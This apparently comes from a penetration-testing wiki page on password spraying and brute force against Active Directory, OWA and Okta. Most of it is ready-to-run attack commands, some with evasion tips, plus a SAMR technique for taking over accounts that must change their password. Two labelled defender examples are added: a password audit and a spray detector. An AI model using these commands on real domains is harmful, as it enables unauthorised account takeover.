Password Spraying / Brute Force
tip
Learn and practice AWS Hacking:
HackTricks Training AWS Red Team Expert (ARTE)
Learn and practice GCP Hacking:
HackTricks Training GCP Red Team Expert (GRTE)
Learn and practice Azure Hacking:
HackTricks Training Azure Red Team Expert (AzRTE)
Support HackTricks
- Check the subscription plans!
- Join the 💬 Discord group or the telegram group or follow us on Twitter 🐦 @hacktricks_live.
- Share hacking tricks by submitting PRs to the HackTricks and HackTricks Cloud github repos.
 
Password Spraying
Once you have found several valid usernames, you can try the most common passwords (keeping in mind the password policy of the environment) against each of the discovered users.
By default the minimum password length is 7.
Lists of common usernames can also be useful: https://github.com/insidetrust/statistically-likely-usernames
Note that you can lock out some accounts if you try several wrong passwords (by default more than 10).
Get password policy
If you have user credentials or a shell as a domain user, you can get the password policy with:
# From Linux
crackmapexec <IP> -u 'user' -p 'password' --pass-pol
enum4linux -u 'username' -p 'password' -P <IP>
rpcclient -U "" -N 10.10.10.10;
rpcclient $>querydominfo
ldapsearch -h 10.10.10.10 -x -b "DC=DOMAIN_NAME,DC=LOCAL" -s sub "*" | grep -m 1 -B 10 pwdHistoryLength
# From Windows
net accounts
(Get-DomainPolicy)."SystemAccess" #From powerview
Exploitation from Linux (or all)
- Using crackmapexec:
 
crackmapexec smb <IP> -u users.txt -p passwords.txt
# Local Auth Spray (once you found some local admin pass or hash)
## the --local-auth flag indicates to only try 1 time per machine
crackmapexec smb --local-auth 10.10.10.10/23 -u administrator -H 10298e182387f9cab376ecd08491764a0 | grep +
- Using NetExec (CME successor) for targeted, low-noise spraying over SMB/WinRM:
 
# Optional: generate a hosts entry to ensure Kerberos FQDN resolution
netexec smb <DC_IP> --generate-hosts-file hosts && cat hosts /etc/hosts | sudo sponge /etc/hosts
# Spray a single candidate password against harvested users over SMB
netexec smb <DC_FQDN> -u users.txt -p 'Password123!' \
--continue-on-success --no-bruteforce --shares
# Validate a hit over WinRM (or use SMB exec methods)
netexec winrm <DC_FQDN> -u <username> -p 'Password123!' -x "whoami"
# Tip: sync your clock before Kerberos-based auth to avoid skew issues
sudo ntpdate <DC_FQDN>
- Using kerbrute (Go)
 
# Password Spraying
./kerbrute_linux_amd64 passwordspray -d lab.ropnop.com [--dc 10.10.10.10] domain_users.txt Password123
# Brute-Force
./kerbrute_linux_amd64 bruteuser -d lab.ropnop.com [--dc 10.10.10.10] passwords.lst thoffman
- spray (you can indicate the number of attempts to avoid account lockouts):
 
spray.sh -smb <targetIP> <usernameList> <passwordList> <AttemptsPerLockoutPeriod> <LockoutPeriodInMinutes> <DOMAIN>
- Using kerbrute (python) - not recommended, sometimes it doesn't work
 
python kerbrute.py -domain jurassic.park -users users.txt -passwords passwords.txt -outputfile jurassic_passwords.txt
python kerbrute.py -domain jurassic.park -users users.txt -password Password123 -outputfile jurassic_passwords.txt
- With the scanner/smb/smb_login module of Metasploit
- Using rpcclient:
 
# https://www.blackhillsinfosec.com/password-spraying-other-fun-with-rpcclient/
for u in $(cat users.txt); do
rpcclient -U "$u%Welcome1" -c "getusername;quit" 10.10.10.10 | grep Authority;
done
From Windows
- With the Rubeus version that has the brute module:
 
# with a list of users
.\Rubeus.exe brute /users:<users_file> /passwords:<passwords_file> /domain:<domain_name> /outfile:<output_file>
# check passwords for all users in current domain
.\Rubeus.exe brute /passwords:<passwords_file> /outfile:<output_file>
- With Invoke-DomainPasswordSpray (it can generate users from the domain by default, and it will fetch the domain password policy and limit attempts according to it):
 
Invoke-DomainPasswordSpray -UserList .\users.txt -Password 123456 -Verbose
Invoke-SprayEmptyPassword
Identify and Take Over "Password must change at next logon" Accounts (SAMR)
A low-noise technique is to spray a benign/empty password and catch accounts that return STATUS_PASSWORD_MUST_CHANGE, which indicates the password has been force-expired and can be changed without knowing the old one.
Workflow:
- Enumerate users (RID brute via SAMR) to build the target list:
 
# NetExec (null/guest) + RID brute to harvest users
netexec smb <dc_fqdn> -u '' -p '' --rid-brute | awk -F'\\\\| ' '/SidTypeUser/ {print $3}' > users.txt
- Spray an empty password and continue on hits to catch accounts that must change their password at next logon:
 
# Will show valid, lockout, and STATUS_PASSWORD_MUST_CHANGE among results
netexec smb <DC.FQDN> -u users.txt -p '' --continue-on-success
- For each hit, change the password over SAMR with NetExec's module (no old password is needed when "must change" is set):
 
# Strong complexity to satisfy policy
env NEWPASS='P@ssw0rd!2025#' ; \
netexec smb <DC.FQDN> -u <User> -p '' -M change-password -o NEWPASS="$NEWPASS"
# Validate and retrieve domain password policy with the new creds
netexec smb <DC.FQDN> -u <User> -p "$NEWPASS" --pass-pol
Operational notes:
- Make sure your host clock is synchronised with the DC before Kerberos-based operations: sudo ntpdate <dc_fqdn>.
- A [+] without (Pwn3d!) in certain modules (e.g. RDP/WinRM) means the creds are valid but the account does not have interactive logon rights.
 
Brute Force
legba kerberos --target 127.0.0.1 --username admin --password wordlists/passwords.txt --kerberos-realm example.org
Kerberos pre-auth spraying with LDAP targeting and PSO-aware throttling (SpearSpray)
Kerberos pre-auth based spraying reduces noise compared with SMB/NTLM/LDAP bind attempts and aligns better with AD lockout policies. SpearSpray couples LDAP-driven targeting, a pattern engine and policy awareness (domain policy + PSOs + badPwdCount buffer) to spray precisely and safely. It can also tag compromised principals in Neo4j for BloodHound pathing.
Key ideas:
- LDAP user discovery with paging and LDAPS support, optionally with custom LDAP filters.
- Domain lockout policy + PSO-aware filtering to leave a configurable attempt buffer (threshold) and avoid locking out user accounts.
- Kerberos pre-auth validation using fast gssapi bindings (generates 4768/4771 on DCs instead of 4625).
- Pattern-based, per-user password generation with variables such as names and time values derived from each user's pwdLastSet.
- Throughput control with threads, jitter and a maximum number of requests per second.
- Optional Neo4j integration to mark owned users for BloodHound.
 
Basic usage and discovery:
# List available pattern variables
spearspray -l
# Basic run (LDAP bind over TCP/389)
spearspray -u pentester -p Password123 -d fabrikam.local -dc dc01.fabrikam.local
# LDAPS (TCP/636)
spearspray -u pentester -p Password123 -d fabrikam.local -dc dc01.fabrikam.local --ssl
Targeting and pattern control:
# Custom LDAP filter (e.g., target specific OU/attributes)
spearspray -u pentester -p Password123 -d fabrikam.local -dc dc01.fabrikam.local \
-q "(&(objectCategory=person)(objectClass=user)(department=IT))"
# Use separators/suffixes and an org token consumed by patterns via {separator}/{suffix}/{extra}
spearspray -u pentester -p Password123 -d fabrikam.local -dc dc01.fabrikam.local -sep @-_ -suf !? -x ACME
Stealth and safety controls:
# Control concurrency, add jitter, and cap request rate
spearspray -u pentester -p Password123 -d fabrikam.local -dc dc01.fabrikam.local -t 5 -j 3,5 --max-rps 10
# Leave N attempts in reserve before lockout (default threshold: 2)
spearspray -u pentester -p Password123 -d fabrikam.local -dc dc01.fabrikam.local -thr 2
Neo4j/BloodHound enrichment:
spearspray -u pentester -p Password123 -d fabrikam.local -dc dc01.fabrikam.local -nu neo4j -np bloodhound --uri bolt://localhost:7687
Pattern system overview (patterns.txt):
# Example templates consuming per-user attributes and temporal context
{name}{separator}{year}{suffix}
{month_en}{separator}{short_year}{suffix}
{season_en}{separator}{year}{suffix}
{samaccountname}
{extra}{separator}{year}{suffix}
Available variables include:
- {name}, {samaccountname}
- Temporal values derived from each user's pwdLastSet (or whenCreated): {year}, {short_year}, {month_number}, {month_en}, {season_en}
- Composition helpers and the org token: {separator}, {suffix}, {extra}
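As an added example from the defender's side (not SpearSpray's code and not from the original page), the following Python compiles the templates above into anchored regexes so that a password-change filter or a password audit can reject passwords shaped like them. The variable classes, the user record fields (name, sam) and the org token ACME are assumptions.

```python
"""Template-shaped password check (added example, not SpearSpray code).

Turns the patterns.txt-style templates into regexes and reports which
template, if any, a candidate password matches. Intended for a password
filter or audit: passwords shaped like these are exactly what a
pattern-driven spray will try first.
"""
import re

MONTHS = ("january|february|march|april|may|june|july|august|"
          "september|october|november|december")
SEASONS = "spring|summer|autumn|fall|winter"

# Same templates as the patterns.txt excerpt on the page
TEMPLATES = [
    "{name}{separator}{year}{suffix}",
    "{month_en}{separator}{short_year}{suffix}",
    "{season_en}{separator}{year}{suffix}",
    "{samaccountname}",
    "{extra}{separator}{year}{suffix}",
]


def template_regex(template, user, extra="ACME"):
    """Compile one template into an anchored, case-insensitive regex.
    Per-user fields become escaped literals; the other variables become
    bounded character classes (the classes below are assumptions)."""
    classes = {
        "{name}": re.escape(user["name"]),
        "{samaccountname}": re.escape(user["sam"]),
        "{extra}": re.escape(extra),
        "{year}": r"(?:19|20)\d{2}",
        "{short_year}": r"\d{2}",
        "{month_en}": f"(?:{MONTHS})",
        "{season_en}": f"(?:{SEASONS})",
        "{separator}": r"[@._\-]?",      # optional single separator
        "{suffix}": r"[!?#$*.]{0,3}",    # up to three trailing symbols
    }
    pattern = re.sub(r"\{\w+\}", lambda m: classes[m.group(0)], template)
    return re.compile(f"^{pattern}$", re.IGNORECASE)


def matches_template(password, user, extra="ACME"):
    """Return the first template the password matches, or None."""
    for template in TEMPLATES:
        if template_regex(template, user, extra).match(password):
            return template
    return None
```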
 
Operational notes:
- Prefer querying the PDC emulator with -dc to read the most authoritative badPwdCount and policy-related information.
- badPwdCount resets are triggered on the next attempt after the observation window; use the threshold and timing to stay safe.
- Kerberos pre-auth attempts show up as 4768/4771 in DC telemetry; use jitter and rate limiting to blend in.
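As an added defender-side example (not from the page or from any tool it describes), the following Python flags the footprint that both the Kerberos pre-auth spraying described here and the empty-password SMB spray of the SAMR section leave on a DC: one source failing pre-authentication (4771) or logon (4625) against many distinct accounts within a short window. The event layout and the sample events are constructed for the example.

```python
"""Spray detector over constructed DC security events (added example).

Flags a source that fails Kerberos pre-auth (4771, status 0x18) or an
NTLM/SMB logon (4625) for at least `min_users` distinct accounts inside
`window`. Fields are reduced to event id, source, target user, timestamp
and Kerberos status; the events below are constructed, not real telemetry.
"""
from collections import defaultdict
from datetime import datetime, timedelta

SAMPLE_EVENTS = [  # constructed sample data
    {"id": 4771, "src": "10.10.10.50", "user": "larsson", "status": "0x18", "ts": "2025-01-10T09:00:01"},
    {"id": 4771, "src": "10.10.10.50", "user": "cube0x0", "status": "0x18", "ts": "2025-01-10T09:00:03"},
    {"id": 4771, "src": "10.10.10.50", "user": "a.admin", "status": "0x18", "ts": "2025-01-10T09:00:05"},
    {"id": 4771, "src": "10.10.10.50", "user": "c.cube", "status": "0x18", "ts": "2025-01-10T09:00:07"},
    {"id": 4768, "src": "10.10.10.50", "user": "s.svensson", "status": "0x0", "ts": "2025-01-10T09:00:09"},
    {"id": 4625, "src": "10.10.10.77", "user": "bob", "status": "", "ts": "2025-01-10T09:01:00"},
    {"id": 4625, "src": "10.10.10.77", "user": "bob", "status": "", "ts": "2025-01-10T09:01:30"},
    {"id": 4771, "src": "10.10.10.51", "user": "joe", "status": "0x17", "ts": "2025-01-10T09:02:00"},
]

FAILURE_IDS = {4625, 4771}
# 0x18 = KDC_ERR_PREAUTH_FAILED (wrong password); 4625 carries no Kerberos
# status here. 0x17 (KDC_ERR_KEY_EXPIRED) is an expired password, not a spray.
WRONG_PASSWORD = {"0x18", ""}


def detect_spray(events, window=timedelta(minutes=5), min_users=3):
    """Return {src: sorted(users)} for sources that failed against at
    least `min_users` distinct accounts within one `window`."""
    by_src = defaultdict(list)
    for e in events:
        if e["id"] in FAILURE_IDS and e["status"] in WRONG_PASSWORD:
            by_src[e["src"]].append((datetime.fromisoformat(e["ts"]), e["user"]))
    hits = {}
    for src, attempts in by_src.items():
        attempts.sort()
        for i, (t0, _) in enumerate(attempts):  # sliding window
            users = {u for t, u in attempts[i:] if t - t0 <= window}
            if len(users) >= min_users:
                hits[src] = sorted(users)
                break
    return hits


def followed_by_success(events, src):
    """True if the source also obtained a TGT (4768, status 0x0): the
    spray found a valid password, so the alert deserves higher severity."""
    return any(e["id"] == 4768 and e["src"] == src and e["status"] == "0x0"
               for e in events)
```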
 
Tip: SpearSpray's default LDAP page size is 200; adjust it with -lps as needed.
Outlook Web Access
There are several tools for password spraying Outlook.
- With MSF Owa_login
- With MSF Owa_ews_login
- With Ruler (reliable!)
- With DomainPasswordSpray (Powershell)
- With MailSniper (Powershell)
 
To use any of these tools, you need a user list and a password / a small list of passwords to spray.
./ruler-linux64 --domain reel2.htb -k brute --users users.txt --passwords passwords.txt --delay 0 --verbose
[x] Failed: larsson:Summer2020
[x] Failed: cube0x0:Summer2020
[x] Failed: a.admin:Summer2020
[x] Failed: c.cube:Summer2020
[+] Success: s.svensson:Summer2020
Okta
- https://github.com/ustayready/CredKing/blob/master/credking.py
 - https://github.com/Rhynorater/Okta-Password-Sprayer
 - https://github.com/knavesec/CredMaster
 
References
- https://github.com/sikumy/spearspray
 - https://github.com/TarlogicSecurity/kerbrute
 - https://github.com/Greenwolf/Spray
 - https://github.com/Hackndo/sprayhound
 - https://github.com/login-securite/conpass
 - https://ired.team/offensive-security-experiments/active-directory-kerberos-abuse/active-directory-password-spraying
 - https://www.ired.team/offensive-security/initial-access/password-spraying-outlook-web-access-remote-shell
 - www.blackhillsinfosec.com/?p=5296
 - https://hunter2.gitbook.io/darthsidious/initial-access/password-spraying
 - HTB Sendai – 0xdf: from spray to gMSA to DA/SYSTEM
 - HTB: Baby — Anonymous LDAP → Password Spray → SeBackupPrivilege → Domain Admin
 